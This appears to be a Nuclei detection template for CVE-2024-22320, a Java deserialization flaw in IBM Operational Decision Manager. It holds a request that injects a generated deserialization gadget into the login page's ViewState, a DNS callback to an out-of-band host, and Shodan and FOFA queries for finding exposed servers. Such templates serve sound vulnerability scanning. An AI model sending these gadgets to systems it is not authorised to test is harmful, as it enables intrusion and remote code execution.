id: CVE-2024-22320 info: name: IBM Operational Decision Manager - Java Deserialization author: DhiyaneshDK severity: high description: | IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146. impact: | Authenticated attackers can execute arbitrary code on the system through unsafe deserialization, potentially achieving complete system compromise. remediation: | Update IBM Operational Decision Manager to a version that addresses CVE-2024-22320. reference: - https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2024-22320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2024-22320 cwe-id: CWE-502 epss-score: 0.90845 epss-percentile: 0.99645 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ibm product: operational_decision_manager shodan-query: - html:"IBM ODM" - http.html:"ibm odm" fofa-query: - title="IBM ODM" - title="ibm odm" - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce,vkev,vuln http: - method: GET path: - '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}' matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - 'javax.servlet.ServletException' - type: status status: - 500 # digest: 490a0046304402201ed05933acab4593ce656816996a76365b70da89cc79ce156747147f2a2417c2022028d5165b5987c0a0a8b3b0fe1dcb2d1cb04cd0fe081d21a2821176d907133979:922c64590222798bb761d5b6d8e72950